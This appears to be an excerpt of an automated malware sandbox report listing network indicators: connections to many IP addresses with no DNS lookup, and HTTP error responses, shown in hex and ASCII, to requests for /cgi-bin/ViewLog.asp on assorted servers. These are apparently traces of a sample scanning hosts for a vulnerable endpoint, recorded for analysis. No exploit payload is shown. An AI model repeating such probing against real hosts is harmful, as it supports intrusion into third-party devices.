    Source: unknownTCP traffic detected without corresponding DNS query: 161.145.208.118
    Source: unknownTCP traffic detected without corresponding DNS query: 170.202.109.214
    Source: unknownTCP traffic detected without corresponding DNS query: 185.182.239.222
    Source: unknownTCP traffic detected without corresponding DNS query: 124.20.34.96
    Source: unknownTCP traffic detected without corresponding DNS query: 119.242.12.236
    Source: unknownTCP traffic detected without corresponding DNS query: 106.59.248.81
    Source: unknownTCP traffic detected without corresponding DNS query: 122.88.54.80
    Source: unknownTCP traffic detected without corresponding DNS query: 172.76.178.15
    Source: unknownTCP traffic detected without corresponding DNS query: 39.182.21.17
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 05:13:13 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 207Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 61 70 70 2f 77 65 62 73 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/app/webs/cgi-bin/ViewLog.asp</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:15:11 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1095Date: Thu, 23 Nov 2023 04:15:17 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Thu, 23 Nov 2023 04:15:20 GMTServer: lighttpd/1.4.45Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 382Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 382Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:38 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.30 26Oct2018Date: Thu, 23 Nov 2023 04:15:39 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sContent-Security-Policy: frame-ancestors 'none'Content-Security-Policy: frame-ancestors 'self'Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 63 63 39 39 39 39 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 0a 20 20 20 20 3c 68 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 20 20 20 20 3c 68 72 3e 0a 0a 20 20 20 20 3c 61 64 64 72 65 73 73 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 33 30 20 32 36 4f 63 74 32 30 31 38 3c 2f 61 3e 3c 2f 61 64 64 72 65 73 73 3e 0a 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <title>404 Not Found</title> </head> <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc"> <h4>404 Not Found</h4>File not found. <hr> <address><a href="http://www.acme.com/software/mini_httpd/">mini_httpd/1.30 26Oct2018</a></address> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 23 Nov 2023 04:15:48 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Thu, 23 Nov 2023 04:15:46 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 23 Nov 2023 04:15:46 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:57 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 23 Nov 2023 04:16:11 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Set-Cookie: FCSESSIONID=9CDF331A8262E9F212B783E50D57FF9A; Path=/; HttpOnlyContent-Type: text/html;charset=UTF-8Content-Length: 2833Date: Thu, 23 Nov 2023 04:16:18 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Thu, 23 Nov 2023 04:16:18 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 32 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 174Content-Encoding: gzipVary: Accept-EncodingServer: CherryPy/8.1.2Date: Thu, 23 Nov 2023 04:16:26 GMTContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 23 Nov 2023 04:16:28 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:16:28 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
